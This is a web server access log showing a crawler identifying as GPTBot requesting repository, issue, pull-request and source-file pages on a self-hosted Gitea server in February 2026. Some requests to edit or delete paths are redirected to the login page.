git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17215] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:18:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" -[17/Feb/2026:18:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:17:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:18:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:17:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:18:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:18:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12479] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:18:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=all&type=all" [Client 74.7.227.38] [Length 9919] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" -[17/Feb/2026:18:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72035] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118641] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log?display=source" [Client 74.7.227.38] [Length 27894] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:18:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:18:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fusdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20842] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" -[17/Feb/2026:18:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2fkrx_gold_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20841] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/krx_gold_fetcher.cpython-312.pyc" -[17/Feb/2026:18:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" -[17/Feb/2026:18:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 